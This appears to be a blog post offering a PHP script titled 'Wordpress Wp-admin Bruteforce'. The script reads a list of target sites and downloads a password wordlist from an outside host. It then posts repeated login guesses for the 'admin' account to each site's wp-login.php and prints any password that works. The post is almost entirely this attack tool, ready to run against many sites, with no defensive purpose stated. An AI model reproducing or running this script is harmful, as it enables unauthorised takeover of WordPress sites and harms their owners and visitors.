0

Wordpress Wp-admin Bruteforce

<?php 
class wp
{
public $site; 
public $password; 
public $wordlist; 
public $siteler; 
public $regex = 'general.php'; 
public function wordlist() { 
$liste = file_get_contents("http://afrikanhosting.com/images/wp.txt"); 
$this->wordlist = explode("\n",$liste); 
return $this->wordlist; 
} 
public function curl($site,$password)
{
$curl = curl_init(); 
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php"); 
curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat"); 
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); 
curl_setopt($curl,CURLOPT_POST,1); 
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1"); 
$calis = curl_exec($curl); 
return $calis; 
} 
public function siteler($liste)
{ 
$site = file_get_contents($liste); 
$this->siteler = explode("\n",$site); return $this->siteler; 
} 
public function burtay($liste)
{ 
$this->siteler($liste); 
foreach($this->siteler as $sites)
{ 
$site = trim($sites); 
echo "Denenen Site : " . $site . "\n"; 
foreach($this->wordlist() as $sifre) 
{ 
$password = trim($sifre); 
echo "Denenen Sifre " . $password . "\n"; 
if ( eregi ($this->regex,$this->curl($site,$password)) )
{
echo "-------------------------------------\n"; 
echo $site . " icin sifre kirildi sifre : " . $password . "\n" ; 
echo "xxx\n"; 
echo "xxx\n"; 
echo "-------------------------------------\n"; 
break; 
}
}
}
}
}
echo " ------------------ xxxxx || xxx || ------------------ \n\n "; 
$class = new wp(); $class->burtay($argv[1]); 
?>


Regards,
Hardeep Singh
(www.fb.com/h4rdeep)

Post a Comment Blogger

 
Top